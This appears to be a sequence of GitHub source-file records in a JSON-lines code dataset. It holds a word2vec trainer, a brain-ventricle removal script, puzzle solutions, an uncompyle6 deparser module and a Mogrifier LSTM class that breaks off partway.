word_counts[i] for i in range(len(word_counts))}\n tree = HSM.create_huffman_tree(d_counts)\n loss_func = HSM(args.dimensions, tree)\n loss_func.W.data[...] = 0\n elif args.out_type == 'ns':\n cs = [word_counts[w] for w in range(len(word_counts))]\n loss_func = L.NegativeSampling(args.dimensions, cs, args.negative_size)\n loss_func.W.data[...] = 0\n elif args.out_type == 'original':\n loss_func = SoftmaxCrossEntropyLoss(args.dimensions, vocab_context.cnt_words)\n\n return loss_func\n\n\ndef get_model(args, loss_func, vocab, vocab_ngram_tokens, current_utils=utils.word):\n model = None\n if args.subword == 'none':\n if args.model == 'skipgram':\n model = current_utils.SkipGram(vocab.cnt_words, args.dimensions, loss_func)\n if args.model == 'cbow':\n # todo only skipgram supported\n model = current_utils.ContinuousBoW(vocab.cnt_words, args.dimensions, loss_func)\n else:\n if args.model == 'skipgram':\n model = utils.subword.SkipGram(args.subword, vocab, vocab_ngram_tokens, args.dimensions, loss_func, )\n\n if model is None:\n raise Exception('Unknown model and word/subword type: {} \"and\" {}'.format(args.model, args.subword))\n return model\n\n\n#@training.make_extension(trigger=(1, 'epoch'))\n#def dump_embs(trainer):\n# print(\"dumping embeddings\")\nclass EmbedDumper(training.Extension):\n\n def __init__(self, params, vocab):\n self.params = params\n self.vocab = vocab\n self.time_start = timer()\n # def initialize(self, trainer):\n # pass\n\n def __call__(self, trainer):\n # print(\"dumping embeddings\")\n epoch = trainer.updater.epoch\n net = trainer.updater._optimizers[\"main\"].target\n save_embeddings(self.params[\"path_out\"],\n epoch,\n net,\n self.vocab, self.params,\n timer() - self.time_start)\n\n\ndef save_embeddings(path, epoch, model, vocab, metadata, execution_time):\n path = Path(path)\n embeddings = WordEmbeddingsDense()\n embeddings.vocabulary = vocab\n embeddings.metadata.update(metadata)\n embeddings.metadata[\"vocabulary\"] = vocab.metadata\n embeddings.metadata[\"epoch\"] = epoch\n embeddings.metadata[\"vecto_version\"] = vecto.__version__\n embeddings.matrix = cuda.to_cpu(model.getEmbeddings(gpu=metadata[\"gpu\"]))\n if metadata[\"out_type\"] == 'ns':\n model.matrix_context = cuda.to_cpu(model.getEmbeddings_context())\n else:\n model.matrix_context = cuda.to_cpu(model.loss_func.out.W.data)\n embeddings.metadata[\"execution_time\"] = execution_time #time_end - time_start\n embeddings.metadata[\"embeddings_type\"] = \"vanilla\"\n path_out = path / f\"ep_{epoch:03}\"\n embeddings.save_to_dir(path_out)\n\n embeddings.matrix = model.matrix_context\n embeddings.metadata[\"embeddings_type\"] = \"context\"\n embeddings.save_to_dir(os.path.join(path_out, 'context'))\n\n\ndef train(args):\n if args.subword == 'none':\n current_utils = utils.word\n else:\n current_utils = utils.subword\n current_utils.args = args\n\n if args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n cuda.check_cuda_available()\n\n if args.path_vocab == '':\n vocab = create_from_path(args.path_corpus, language=args.language)\n else:\n vocab = Vocabulary()\n vocab.load(args.path_vocab)\n logger.info(\"loaded vocabulary\")\n\n if args.context_representation != 'word': # for deps or ner context representation, we need a new context vocab for NS or HSM loss function.\n vocab_context = create_from_annotated_dir(args.path_corpus, representation=args.context_representation)\n else:\n vocab_context = vocab\n\n vocab_ngram_tokens = None\n if args.subword != 'none':\n if args.path_vocab_ngram_tokens == '':\n vocab_ngram_tokens = create_ngram_tokens_from_dir(args.path_corpus, args.min_gram, args.max_gram)\n else:\n vocab_ngram_tokens = Vocabulary()\n vocab_ngram_tokens.load(args.path_vocab_ngram_tokens)\n\n if args.path_word2chars == '':\n word2chars = None\n else:\n word2chars = get_word2chars(args.path_word2chars)\n\n loss_func = get_loss_func(args, vocab_context)\n model = get_model(args, loss_func, vocab, vocab_ngram_tokens, current_utils)\n\n if args.gpu >= 0:\n model.to_gpu()\n logger.debug(\"model sent to gpu\")\n\n optimizer = chainer.optimizers.Adam()\n optimizer.setup(model)\n save_embeddings(args.path_out, 0, model, vocab, vars(args), 0)\n\n if os.path.isfile(args.path_corpus):\n # todo for file corpus\n pass\n else:\n if args.subword == 'none':\n train_iter = current_utils.DirWindowIterator(path=args.path_corpus, vocab=vocab, window_size=args.window,\n batch_size=args.batchsize, language=args.language)\n else:\n train_iter = current_utils.DirWindowIterator(path=args.path_corpus, vocab=vocab,\n vocab_ngram_tokens=vocab_ngram_tokens, word2chars=word2chars,\n window_size=args.window, batch_size=args.batchsize,\n language=args.language)\n updater = training.StandardUpdater(train_iter, optimizer, converter=current_utils.convert, device=args.gpu)\n trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.path_out)\n\n if os.path.isfile(args.path_corpus):\n # todo for file corpus\n # trainer.extend(extensions.Evaluator(val_iter, model, converter=convert, device=args.gpu))\n # trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'elapsed_time']))\n pass\n else:\n trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'elapsed_time']))\n trainer.extend(extensions.ProgressBar())\n trainer.extend(extensions.LogReport())\n trainer.extend(EmbedDumper(vars(args), vocab), trigger=(1, 'epoch'))\n trainer.run()\n\n\ndef run(args):\n train(args)\n\n logger.info(\"model saved to \" + args.path_out)\n\n\ndef main():\n args = parse_args()\n print_params(args)\n\n run(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vecto-ai/vecto","sub_path":"vecto/embeddings/train_word2vec.py","file_name":"train_word2vec.py","file_ext":"py","file_size_in_byte":11728,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"41401510548","text":"#!python\n# -*- coding: utf-8 -*-\n#\n# This software and supporting documentation are distributed by\n# Institut Federatif de Recherche 49\n# CEA/NeuroSpin, Batiment 145,\n# 91191 Gif-sur-Yvette cedex\n# France\n#\n# This software is governed by the CeCILL license version 2 under\n# French law and abiding by the rules of distribution of free software.\n# You can use, modify and/or redistribute the software under the\n# terms of the CeCILL license version 2 as circulated by CEA, CNRS\n# and INRIA at the following URL \"http://www.cecill.info\".\n#\n# As a counterpart to the access to the source code and rights to copy,\n# modify and redistribute granted by the license, users are provided only\n# with a limited warranty and the software's author, the holder of the\n# economic rights, and the successive licensors have only limited\n# liability.\n#\n# In this respect, the user's attention is drawn to the risks associated\n# with loading, using, modifying and/or developing or reproducing the\n# software by the user in light of its specific status of free software,\n# that may mean that it is complicated to manipulate, and that also\n# therefore means that it is reserved for developers and experienced\n# professionals having in-depth computer knowledge. Users are therefore\n# encouraged to load and test the software's suitability as regards their\n# requirements in conditions enabling the security of their systems and/or\n# data to be ensured and, more generally, to use and operate it in the\n# same conditions as regards security.\n#\n# The fact that you are presently reading this means that you have had\n# knowledge of the CeCILL license version 2 and that you accept its terms.\n\n\"\"\" Remove ventricle from a volume through the automatic labelled graph\nby Morphologist.\nBe careful :\nWith the BIDS argument, the session-acquisition-run Morphologist folder\nshould be replaced by a '*' in the argument.\n\"\"\"\n\nimport argparse\nimport glob\nimport re\nimport sys\nfrom os.path import abspath, basename, join, exists, isdir\nimport numpy as np\nfrom p_tqdm import p_map\nfrom soma import aims\n\nfrom deep_folding.brainvisa import exception_handler\nfrom deep_folding.brainvisa.utils.folder import create_folder\nfrom deep_folding.brainvisa.utils.subjects import get_number_subjects\nfrom deep_folding.brainvisa.utils.subjects import select_subjects_int\nfrom deep_folding.brainvisa.utils.logs import setup_log\nfrom deep_folding.brainvisa.utils.parallel import define_njobs\nfrom deep_folding.brainvisa.utils.quality_checks import \\\n compare_number_aims_files_with_expected\nfrom deep_folding.config.logs import set_file_logger\n\n# Import constants\nfrom deep_folding.brainvisa.utils.constants import \\\n _ALL_SUBJECTS, _SRC_DIR_DEFAULT, \\\n _SKELETON_DIR_DEFAULT, _SIDE_DEFAULT, \\\n _PATH_TO_GRAPH_DEFAULT\n\n_OUTPUT_DIR_DEFAULT = join(_SKELETON_DIR_DEFAULT, \"without_ventricle\")\n_SRC_FILENAME_DEFAULT = \"skeleton_generated\"\n_OUTPUT_FILENAME_DEFAULT = \"skeleton_generated_without_ventricle\"\n_LABELLING_SESSION_DEFAULT = \"deepcnn_session_auto\"\n\n# Defines logger\nlog = set_file_logger(__file__)\n\n\ndef remove_ventricle_from_graph(volume_file, labelled_graph_file):\n volume = aims.read(volume_file)\n arr = np.asarray(volume)\n labelled_graph = aims.read(labelled_graph_file)\n for vertex in labelled_graph.vertices():\n if \"label\" in vertex:\n label = vertex[\"label\"]\n if label.startswith(\"ventricle\"):\n for bucket_name in ('aims_other', 'aims_ss',\n 'aims_bottom'):\n bucket = vertex.get(bucket_name)\n if bucket is not None:\n voxels = np.array(bucket[0].keys())\n if voxels.shape == (0,):\n continue\n for i, j, k in voxels:\n arr[i, j, k] = 0\n return volume\n\n\ndef parse_args(argv):\n \"\"\"Parses command-line arguments\n Args:\n argv: a list containing command line arguments\n Returns:\n args\n \"\"\"\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n prog=basename(__file__),\n description=\"Generate volumes without ventricle.\")\n parser.add_argument(\n \"-s\", \"--src_dir\", type=str, default=_SKELETON_DIR_DEFAULT,\n help=\"Directory where are the files you want ventricle \"\n \"to be removed from.\"\n f\"Default is : {_SKELETON_DIR_DEFAULT}\")\n parser.add_argument(\n \"-o\", \"--output_dir\", type=str, default=_OUTPUT_DIR_DEFAULT,\n help=\"Output directory where to put the files without ventricle. \"\n f\"Default is : {_OUTPUT_DIR_DEFAULT}\")\n parser.add_argument(\n \"-m\", \"--morpho_dir\", type=str, default=_SRC_DIR_DEFAULT,\n help=\"Directory where the graph data lies. It has to point directly to\"\n \"the morphologist directory containing the subjects \"\n \"as subdirectories. \"\n f\"Default is : {_SRC_DIR_DEFAULT}\")\n parser.add_argument(\n \"-p\", \"--path_to_graph\", type=str,\n default=_PATH_TO_GRAPH_DEFAULT,\n help=\"Relative path to graph. \"\n \"In BIDS format, the session_acquisition_run directory \"\n \"have to be replaced by *. \"\n f\"Default is : {_PATH_TO_GRAPH_DEFAULT}\")\n parser.add_argument(\n \"-l\", \"--labelling_session\",\n default=_LABELLING_SESSION_DEFAULT,\n help=\"Name of the labelling session in Morphologist tree. \"\n f\"Default is : {_LABELLING_SESSION_DEFAULT}\")\n parser.add_argument(\n \"-f\", \"--src_filename\", type=str,\n default=_SRC_FILENAME_DEFAULT,\n help=\"Filename of source files. \"\n \"Format is : _.nii.gz \"\n f\"Default is : {_SRC_FILENAME_DEFAULT}\")\n parser.add_argument(\n \"-e\", \"--output_filename\", type=str, default=_OUTPUT_FILENAME_DEFAULT,\n help=\"Filename of output files. \"\n \"Format is : _.nii.gz \"\n f\"Default is : {_OUTPUT_FILENAME_DEFAULT}\")\n parser.add_argument(\n \"-i\", \"--side\", type=str, default=_SIDE_DEFAULT,\n help=\"Hemisphere side (either L, R or F)\"\n f\"Default is : {_SIDE_DEFAULT}\")\n parser.add_argument(\n \"-b\", \"--bids\", default=False, action=\"store_true\",\n help=\"if the database uses BIDS format\"\n \"Default is : False\")\n parser.add_argument(\n \"-a\", \"--parallel\", default=False, action='store_true',\n help='if set (-a), launches computation in parallel')\n parser.add_argument(\n \"-n\", \"--nb_subjects\", type=str, default=\"all\",\n help='Number of subjects to take into account, or \\'all\\'. '\n '0 subject is allowed, for debug purpose.'\n 'Default is : all')\n parser.add_argument(\n '-v', '--verbose', action='count', default=0,\n help='Verbose mode: '\n 'If no option is provided then logging.INFO is selected. '\n 'If one option -v (or -vv) or more is provided '\n 'then logging.DEBUG is selected.')\n\n args = parser.parse_args(argv)\n dico_suffix = {\"R\": \"right\", \"L\": \"left\", \"F\": \"full\"}\n setup_log(args,\n log_dir=f\"{args.output_dir}\",\n prog_name=basename(__file__),\n suffix=dico_suffix[args.side])\n\n params = vars(args)\n\n params['output_dir'] = abspath(args.output_dir)\n params['morpho_dir'] = abspath(args.morpho_dir)\n params['src_dir'] = abspath(args.src_dir)\n # Checks if nb_subjects is either the string \"all\" or a positive integer\n params['nb_subjects'] = get_number_subjects(args.nb_subjects)\n\n return params\n\n\nclass RemoveVentricleFromVolume:\n \"\"\"Class to remove ventricle from volume files through the automatic\n labelling graph computed by Morphologist. The default automatic labelling\n session is : deepcnn_session_auto.\n\n It contains all the information to get labelled graphs from volume\n filenames and to write new volumes without ventricle in the target\n directory.\n \"\"\"\n\n def __init__(self, src_dir, output_dir,\n morpho_dir, path_to_graph, labelling_session,\n src_filename, output_filename,\n side, bids, parallel):\n\n self.side = side\n self.bids = bids\n self.parallel = parallel\n self.morpho_dir = morpho_dir\n self.path_to_graph = path_to_graph\n self.labelling_session = labelling_session\n self.src_dir = join(src_dir, self.side)\n self.output_dir = join(output_dir, self.side)\n create_folder(abspath(self.output_dir))\n\n self.expr = f\"{self.side}{src_filename}_(.*).nii.gz$\"\n self.src_file = f\"%(side)s{src_filename}_%(subject)s.nii.gz\"\n self.output_file = f\"%(side)s{output_filename}_%(subject)s.nii.gz\"\n\n def remove_ventricle_from_one_subject(self, subject: str):\n \"\"\" Removes ventricle and writes new volume file for one subject.\n \"\"\"\n\n sbj = {\"subject\": subject, \"side\": self.side}\n\n src_file = join(self.src_dir, self.src_file % sbj)\n\n output_file = join(self.output_dir, self.output_file % sbj)\n\n labelled_graph_list = self.get_labelled_graph(subject)\n\n log.debug(f\"src_file = {src_file}\")\n log.debug(f\"labelled_graphs = {labelled_graph_list}\")\n log.debug(f\"output_file = {output_file}\")\n\n if exists(src_file):\n for graph_file in labelled_graph_list:\n if exists(graph_file):\n volume = remove_ventricle_from_graph(\n src_file, graph_file)\n else:\n raise FileNotFoundError(f\"Labelled graph not found : \\\n {graph_file}\")\n aims.write(volume, output_file)\n else:\n raise FileNotFoundError(f\"Source file not found : \\\n {src_file}\")\n\n def get_labelled_graph(self, subject: str):\n \"\"\" Find the labelled graph in the morphologist database from the\n source filename.\n \"\"\"\n labelled_graph_list = []\n side_list = [\"L\", \"R\"] if self.side == \"F\" else [self.side]\n if subject.startswith(\"_\"):\n subject = subject[1:]\n for side in side_list:\n if self.bids:\n split = subject.split(\"_\")\n subject_id = split[0]\n if len(split) > 1:\n keys = \"_\".join(split[1:])\n else:\n keys = \"\"\n log.warning(f\"The subject {subject} has no session, acquisition or run.\")\n filename = f\"{side}{subject_id}_{self.labelling_session}.arg\"\n labelled_graph_file = join(\n self.morpho_dir, subject_id, self.path_to_graph.replace(\n \"*\", keys), self.labelling_session, filename)\n else:\n filename = f\"{side}{subject}_{self.labelling_session}.arg\"\n labelled_graph_file = join(\n self.morpho_dir,\n subject,\n self.path_to_graph,\n self.labelling_session,\n filename)\n labelled_graph_list.append(labelled_graph_file)\n return labelled_graph_list\n\n def compute(self, number_subjects):\n \"\"\"Loops over subjects and remove ventricle from volumes.\n \"\"\"\n # Gets list of subjects\n log.debug(f\"src_dir = {self.src_dir}\")\n log.debug(f\"reg exp = {self.expr}\")\n\n if isdir(self.src_dir):\n filenames = glob.glob(f\"{self.src_dir}/*.nii.gz\")\n log.debug(f\"Volume files list = {filenames}\")\n\n list_subjects = [re.search(self.expr, basename(filename))[1]\n for filename in filenames\n if not re.search('.minf$', filename)]\n list_subjects = select_subjects_int(list_subjects, number_subjects)\n\n log.info(f\"Expected number of subjects = {len(list_subjects)}\")\n log.info(f\"list_subjects[:5] = {list_subjects[:5]}\")\n log.debug(f\"list_subjects = {list_subjects}\")\n else:\n raise NotADirectoryError(\n f\"{self.src_dir} doesn't exist or is not a directory\")\n\n # Performs computation on all subjects either serially or in parallel\n if self.parallel:\n log.info(\n \"PARALLEL MODE: subjects are computed in parallel.\")\n p_map(self.remove_ventricle_from_one_subject,\n list_subjects,\n num_cpus=define_njobs())\n else:\n log.info(\n \"SERIAL MODE: subjects are scanned serially, \"\n \"without parallelism\")\n for sub in list_subjects:\n self.remove_ventricle_from_one_subject(sub)\n\n # Checks if there is expected number of generated files\n compare_number_aims_files_with_expected(self.output_dir, list_subjects)\n\n\ndef remove_ventricle(src_dir=_SRC_DIR_DEFAULT,\n output_dir=_OUTPUT_DIR_DEFAULT,\n morpho_dir=_SRC_DIR_DEFAULT,\n path_to_graph=_PATH_TO_GRAPH_DEFAULT,\n labelling_session=_LABELLING_SESSION_DEFAULT,\n src_filename=_SRC_FILENAME_DEFAULT,\n output_filename=_OUTPUT_FILENAME_DEFAULT,\n side=_SIDE_DEFAULT,\n bids=False,\n parallel=False,\n number_subjects=_ALL_SUBJECTS):\n \"\"\"Remove ventricle from a volume\n through the automatic labelled graph by Morphologist\"\"\"\n\n # Initialization\n removal = RemoveVentricleFromVolume(\n src_dir=src_dir,\n output_dir=output_dir,\n morpho_dir=morpho_dir,\n path_to_graph=path_to_graph,\n labelling_session=labelling_session,\n src_filename=src_filename,\n output_filename=output_filename,\n side=side,\n bids=bids,\n parallel=parallel)\n removal.compute(number_subjects=number_subjects)\n\n\n@exception_handler\ndef main(argv):\n \"\"\"Reads argument line and remove ventricle from volumes\n Args:\n argv: a list containing command line arguments\n \"\"\"\n # Parsing arguments\n params = parse_args(argv)\n\n # Actual API\n remove_ventricle(\n src_dir=params[\"src_dir\"],\n output_dir=params[\"output_dir\"],\n morpho_dir=params[\"morpho_dir\"],\n path_to_graph=params[\"path_to_graph\"],\n labelling_session=params[\"labelling_session\"],\n src_filename=params[\"src_filename\"],\n output_filename=params[\"output_filename\"],\n side=params[\"side\"],\n bids=params[\"bids\"],\n parallel=params['parallel'],\n number_subjects=params['nb_subjects'])\n\n\nif __name__ == '__main__':\n # This permits to call main also from another python program\n # without having to make system calls\n main(argv=sys.argv[1:])\n","repo_name":"neurospin/deep_folding","sub_path":"deep_folding/brainvisa/remove_ventricle.py","file_name":"remove_ventricle.py","file_ext":"py","file_size_in_byte":15043,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"38164919356","text":"import logging\r\nimport os\r\n\r\nimport hashlib\r\n\r\nscript_dir = os.path.dirname(__file__)\r\nscript_name = os.path.splitext(os.path.basename(__file__))[0]\r\n\r\nlog_file = os.path.join(script_dir, f\"logs/{script_name}.log\")\r\nlogging.basicConfig(level=logging.WARNING, filename=log_file, filemode='w',)\r\n\r\ndoor_id = \"ojvtpuvg\"\r\n\r\ninteger = 0\r\ndoor_code = \"\"\r\nwhile True:\r\n input_str = f\"{door_id}{integer}\"\r\n result = hashlib.md5(input_str.encode())\r\n hex_output = result.hexdigest()\r\n if hex_output[0:5] == \"00000\":\r\n door_code += hex_output[5]\r\n print(f\"{integer:>10} - door code: [{door_code + '-' * (8 - len(door_code))}]\")\r\n if len(door_code) == 8:\r\n break\r\n integer += 1\r\n\r\nprint(f\"Part 1: {door_code}\")\r\n\r\n\r\ninteger = 0\r\ndoor_code = \"--------\"\r\nwhile True:\r\n input_str = f\"{door_id}{integer}\"\r\n result = hashlib.md5(input_str.encode())\r\n hex_output = result.hexdigest()\r\n if hex_output[0:5] == \"00000\" and hex_output[5] in \"01234567\":\r\n position = int(hex_output[5])\r\n if door_code[position] == \"-\":\r\n door_code = door_code[:position] + hex_output[6] + door_code[position + 1:]\r\n print(f\"{integer:>10} - door code: [{door_code}]\")\r\n if not \"-\" in door_code:\r\n break\r\n integer += 1\r\n\r\nprint(f\"Part 2: {door_code}\")","repo_name":"gid/AoC","sub_path":"Archive/2016/day_5.py","file_name":"day_5.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11114397556","text":"import sys\n\nfrom spark_parser import DEFAULT_DEBUG as PARSER_DEFAULT_DEBUG\nfrom xdis import iscode\n\nfrom xdis.version_info import IS_PYPY\nfrom uncompyle6.scanner import get_scanner\nfrom uncompyle6.semantics.pysource import (\n ASSIGN_DOC_STRING,\n RETURN_NONE,\n SourceWalker,\n SourceWalkerError,\n find_globals_and_nonlocals\n)\nfrom uncompyle6.show import maybe_show_asm\n\n#\n\n\nclass AligningWalker(SourceWalker, object):\n def __init__(\n self,\n version,\n out,\n scanner,\n showast=False,\n debug_parser=PARSER_DEFAULT_DEBUG,\n compile_mode=\"exec\",\n is_pypy=False,\n ):\n SourceWalker.__init__(\n self, version, out, scanner, showast, debug_parser, compile_mode, is_pypy\n )\n self.desired_line_number = 0\n self.current_line_number = 0\n\n def println(self, *data):\n if data and not (len(data) == 1 and data[0] == \"\"):\n self.write(*data)\n\n self.pending_newlines = max(self.pending_newlines, 1)\n\n def write(self, *data):\n if (len(data) == 1) and data[0] == self.indent:\n diff = max(\n self.pending_newlines,\n self.desired_line_number - self.current_line_number,\n )\n self.f.write(\"\\n\" * diff)\n self.current_line_number += diff\n self.pending_newlines = 0\n if (len(data) == 0) or (len(data) == 1 and data[0] == \"\"):\n return\n\n out = \"\".join((str(j) for j in data))\n n = 0\n for i in out:\n if i == \"\\n\":\n n += 1\n if n == len(out):\n self.pending_newlines = max(self.pending_newlines, n)\n return\n elif n:\n self.pending_newlines = max(self.pending_newlines, n)\n out = out[n:]\n break\n else:\n break\n\n if self.pending_newlines > 0:\n diff = max(\n self.pending_newlines,\n self.desired_line_number - self.current_line_number,\n )\n self.f.write(\"\\n\" * diff)\n self.current_line_number += diff\n self.pending_newlines = 0\n\n for i in out[::-1]:\n if i == \"\\n\":\n self.pending_newlines += 1\n else:\n break\n\n if self.pending_newlines:\n out = out[: -self.pending_newlines]\n self.f.write(out)\n\n def default(self, node):\n mapping = self._get_mapping(node)\n if hasattr(node, \"linestart\"):\n if node.linestart:\n self.desired_line_number = node.linestart\n table = mapping[0]\n key = node\n\n for i in mapping[1:]:\n key = key[i]\n pass\n\n if key.type in table:\n self.template_engine(table[key.type], node)\n self.prune()\n\n\nDEFAULT_DEBUG_OPTS = {\"asm\": False, \"tree\": False, \"grammar\": False}\n\n\ndef code_deparse_align(\n co,\n out=sys.stderr,\n version=None,\n is_pypy=None,\n debug_opts=DEFAULT_DEBUG_OPTS,\n code_objects={},\n compile_mode=\"exec\",\n):\n \"\"\"\n ingests and deparses a given code block 'co'\n \"\"\"\n\n assert iscode(co)\n\n if version is None:\n version = float(sys.version[0:3])\n if is_pypy is None:\n is_pypy = IS_PYPY\n\n # store final output stream for case of error\n scanner = get_scanner(version, is_pypy=is_pypy)\n\n tokens, customize = scanner.ingest(co, code_objects=code_objects)\n show_asm = debug_opts.get(\"asm\", None)\n maybe_show_asm(show_asm, tokens)\n\n debug_parser = dict(PARSER_DEFAULT_DEBUG)\n show_grammar = debug_opts.get(\"grammar\", None)\n show_grammar = debug_opts.get(\"grammar\", None)\n if show_grammar:\n debug_parser[\"reduce\"] = show_grammar\n debug_parser[\"errorstack\"] = True\n\n # Build a parse tree from tokenized and massaged disassembly.\n show_ast = debug_opts.get(\"ast\", None)\n deparsed = AligningWalker(\n version,\n scanner,\n out,\n showast=show_ast,\n debug_parser=debug_parser,\n compile_mode=compile_mode,\n is_pypy=is_pypy,\n )\n\n is_top_level_module = co.co_name == \"\"\n deparsed.ast = deparsed.build_ast(\n tokens, customize, co, is_top_level_module=is_top_level_module\n )\n\n assert deparsed.ast == \"stmts\", \"Should have parsed grammar start\"\n\n del tokens # save memory\n\n (deparsed.mod_globs, _) = find_globals_and_nonlocals(\n deparsed.ast, set(), set(), co, version\n )\n\n # convert leading '__doc__ = \"...\" into doc string\n try:\n if deparsed.ast[0][0] == ASSIGN_DOC_STRING(co.co_consts[0]):\n deparsed.print_docstring(\"\", co.co_consts[0])\n del deparsed.ast[0]\n if deparsed.ast[-1] == RETURN_NONE:\n deparsed.ast.pop() # remove last node\n # todo: if empty, add 'pass'\n except Exception:\n pass\n\n # What we've been waiting for: Generate Python source from the parse tree!\n deparsed.gen_source(deparsed.ast, co.co_name, customize)\n\n for g in sorted(deparsed.mod_globs):\n deparsed.write(\"# global %s ## Warning: Unused global\\n\" % g)\n\n if deparsed.ERROR:\n raise SourceWalkerError(\"Deparsing stopped due to parse error\")\n return deparsed\n\n\nif __name__ == \"__main__\":\n\n def deparse_test(co):\n \"This is a docstring\"\n deparsed = code_deparse_align(co)\n print(deparsed.text)\n return\n\n deparse_test(deparse_test.__code__)\n","repo_name":"rocky/python-uncompyle6","sub_path":"uncompyle6/semantics/aligner.py","file_name":"aligner.py","file_ext":"py","file_size_in_byte":5530,"program_lang":"python","lang":"en","doc_type":"code","stars":3383,"dataset":"github-code","pt":"37"} +{"seq_id":"38054306395","text":"import random\nfrom KNN import KNearestNeighbor\nfrom dataProcess import loadAll, dataDir\n\ndef findBestK():\n # k_list = [1, 2, 5, 10, 15, 30, 50, 100]\n x_train, y_train, x_valid, y_valid, x_test, y_test = loadAll(valid_idx = 5)\n classifier = KNearestNeighbor()\n\n # Select 10000 train data randomly\n rd_start = random.randint(0, 3 * 10000 - 1)\n xtr = x_train[rd_start:rd_start + 10000]\n ytr = y_train[rd_start:rd_start + 10000]\n xva = x_valid[:2000]\n yva = y_valid[:2000]\n\n # acc lists for plot\n m1_acc = [0]\n m2_acc = [0]\n \n classifier.train(xtr, ytr)\n for k in range(1, 101):\n Ypred_1 = classifier.predict(xva, k, m = 1)\n m1_acc.append(classifier.evaluate(Ypred_1, yva))\n Ypred_2 = classifier.predict(xva, k, m = 2)\n m2_acc.append(classifier.evaluate(Ypred_2, yva))\n # plotAcc()\n\nif __name__ == '__main__':\n findBestK()","repo_name":"liuyi12138/SeedClass_CV","sub_path":"week1/code/findBestK.py","file_name":"findBestK.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25067064570","text":"from math import factorial\n\ndef numberToBase(n, b):\n if n == 0:\n return [0]\n digits = []\n while n:\n digits.append(n % b)\n n //= b\n return digits[::-1]\n\ndef f5(n):\n count = 0\n while n % 5 == 0:\n count += 1\n n //= 5\n return count\n\ndef T5(n):\n count = 0\n for i in range(1, n+1):\n if f5(factorial(2*i-1)) < 2*f5(factorial(i)):\n count += 1\n print(i, numberToBase(i, 5))\n return count\n\nprint(T5(10**3))\n\n#For the condition to be satisfied, we require that 5 divides i.\n","repo_name":"arnet95/Project-Euler","sub_path":"euler383.py","file_name":"euler383.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71633979628","text":"\nif __name__ == '__main__':\n numInvs, amtNeeded = map(int, input().split())\n invs = []\n for _ in range(numInvs):\n invs.append(list(map(int, input().split())))\n\n minDays = 10**10\n start, stop = 0, 10**9+1\n while start <= stop:\n mid = (stop + start) // 2\n\n total = 0\n for dayReturn, initCost in invs:\n roi = dayReturn * mid - initCost\n if roi > 0:\n total += roi\n\n if total < amtNeeded:\n start = mid + 1\n elif total > amtNeeded:\n stop = mid - 1\n if mid < minDays:\n minDays = mid\n else:\n minDays = mid\n break\n\n print(minDays)\n","repo_name":"gosueep/Kattis","sub_path":"BinSearch/financialplanning/old_FinancialPlanning.py","file_name":"old_FinancialPlanning.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13713128711","text":"from enum import IntEnum\nfrom typing import Optional, Tuple\n\nimport torch\nfrom torch import nn\nfrom torch.nn.parameter import Parameter\n\n\nclass Dim(IntEnum):\n batch = 0\n seq = 1\n feature = 2\n\n\nclass MogLSTM(nn.Module):\n \"\"\"From: https://github.com/RMichaelSwan/MogrifierLSTM/blob/master/MogrifierLSTM.ipynb\"\"\"\n\n def __init__(self, input_sz: int, hidden_sz: int, mog_iterations: int):\n super().__init__()\n self.input_size = input_sz\n self.hidden_size = hidden_sz\n self.mog_iterations = mog_iterations\n # Define/initialize all tensors\n self.Wih = Parameter(torch.Tensor(input_sz, hidden_sz * 4))\n self.Whh = Parameter(torch.Tensor(hidden_sz, hidden_sz * 4))\n self.bih = Parameter(torch.Tensor(hidden_sz * 4))\n self.bhh = Parameter(torch.Tensor(hidden_sz * 4))\n # Mogrifiers\n self.Q = Parameter(torch.Tensor(hidden_sz, input_sz))\n self.R = Parameter(torch.Tensor(input_sz, hidden_sz))\n\n self.init_weights()\n\n def init_weights(self):\n for p in self.parameters():\n if p.data.ndimension() >= 2:\n nn.init.xavier_uniform_(p.data)\n else:\n nn.init.zeros_(p.data)\n\n def mogrify(self, xt, ht):\n for i in range(1, self.mog_iterations + 1):\n if i % 2 == 0:\n ht = (2 * torch.sigmoid(xt @ self.R)) * ht\n else:\n xt = (2 * torch.sigmoid(ht @ self.Q)) * xt\n return xt, ht\n\n # Define forward pass through all LSTM cells across all timesteps.\n # By using PyTorch functions, we get backpropagation for free.\n def forward(\n self,\n x: torch.Tensor,\n init_states: Optional[Tuple[torch.Tensor, torch.Tensor]] = None,\n ) -> Tuple[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]:\n \"\"\"Assumes x is of shape (batch, sequence, feature)\"\"\"\n batch_sz, seq_sz, _ = x.size()\n hidden_seq = []\n # ht and Ct start as the previous states and end as the output states in each loop below\n if init_states is None:\n ht = torch.zeros((batch_sz, self.hidden_size)).to(x.device)\n Ct = torch.zeros((batch_sz, self.hidden_size)).to(x.device)\n else:\n ht, Ct = init_states\n\n for t in range(seq_sz): # iterate over the time steps\n xt = x[:, t, :]\n xt, ht = self.mogrify(xt, ht) # mogrification\n gates = (xt @ self.Wih + self.bih) + (ht @ self.Whh + self.bhh)\n ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)\n\n ### The LSTM Cell!\n ft = torch.sigmoid(forgetgate)\n it = torch.sigmoid(ingate)\n Ct_candidate = torch.tanh(cellgate)\n ot = torch.sigmoid(outgate)\n # outputs\n Ct = (ft * Ct) + (it * Ct_candidate)\n ht = ot * torch.tanh(Ct)\n ###\n\n 